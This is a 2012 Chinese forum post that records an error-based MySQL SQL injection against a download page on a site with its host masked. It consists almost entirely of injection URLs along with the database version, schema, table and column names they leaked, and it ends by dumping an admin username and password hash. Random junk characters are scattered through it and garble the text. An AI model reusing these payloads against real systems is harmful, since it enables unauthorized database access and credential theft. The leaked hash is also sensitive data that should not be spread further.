http://www.wooyun.org/bugs/wooyun-2010-01666
* f; C. e* F; n6 U, k, h1 n; O1 D2 @/ Q! X4 r
之前想找个测试 没想到这有 可以测试下做个记录而已
! u* W# Z6 ?" f5 O" `- Y6 Y
8 E# C+ |* N! s2 M8 z- @http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0031 h3 W0 l3 x3 S1 u6 s/ u
- `9 O6 u5 [7 t6 E: U4 K& I7 s+ Y" \/data0/htdocs/leqi_new/app/myapp.php3 `# U% D3 x P! T8 b( ~/ Z+ o4 O
2 y1 ]! |8 S) ^; p 或者 G) v4 s& y/ D
" u. P7 n/ h) O( x. y5 I9 c
/**********version()**********/ 5.1.49-log
# j+ A8 U! N3 \8 w4 R+ w- _http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- }, j+ c$ C( T# V* b
r; L4 E% n) z4 [" ^: l0 v3 G, P/**********user()**********/ $ ]) Y8 t$ D2 R: C
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, g9 d- k y q0 a8 v( d
" e$ i6 p$ f' `: @/**********database()**********/ leqi3 j0 Z+ t5 O* L
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. o6 b1 H$ P P% ~) V2 j4 A
7 B/ @# j) G6 B9 A( J/**********limit依次递归爆库**********/1 }- D: N) S7 T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0035 D3 G1 p' c2 F/ s! ]
information_schema
+ o. X3 a& f w% `http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: @+ j2 ?+ j3 R6 wleqi
. H& X0 [ v! L5 _2 O- qhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: |! e3 F8 @' O/ S- v, mtest
7 K2 h5 Q9 O# j2 X' J) O- U
0 i" l7 R! e5 D6 V/ w/**********limit依次递归爆表名**********/$ [" O9 ~& q: D p9 Q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
$ L5 ~- P4 o- Y4 \0 lusers$ z& j* R8 `0 X( Y% e
, [: J+ K/ }5 f' M. {/**********limit依次递归爆字段名**********/' _; u8 {2 W( `/ f
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' t4 b- j; b% _* _% V. auser_id,username,nickname,passwd,group_id
/ d- O8 b0 n. O- {http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
3 Y# ?8 [3 R" k/wapc/5000_0005_0032 M5 x; g. V$ R' H; n, n0 _2 R
11 217 a5 P+ Q6 J B4 `. t5 g- Q4 f
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23! t/ D C; }0 C; f. O# z8 A
/wapc/5000_0005_0039 @* X" d% p" b# H9 T( E- f" \
11 341 351 361; i/ B2 Y+ \9 u0 s# {9 L# N
/**********爆数据**********/& D3 f& p1 F8 Q; w& P' H* n
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23! J9 w) Z# H1 H. L: q; \- U" Q
admin, B4 f" @# |8 U, Q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23, [1 G( @, T l
6a8b4574ca231eb8bd52764d4978ffcd% W) g% a* B6 V2 h# T) O4 j
: E3 j. p& S/ D/ i
6 A# e! J; Q3 k' p% {
|
发表于 2012-9-13 17:52:09
收藏
支持
反对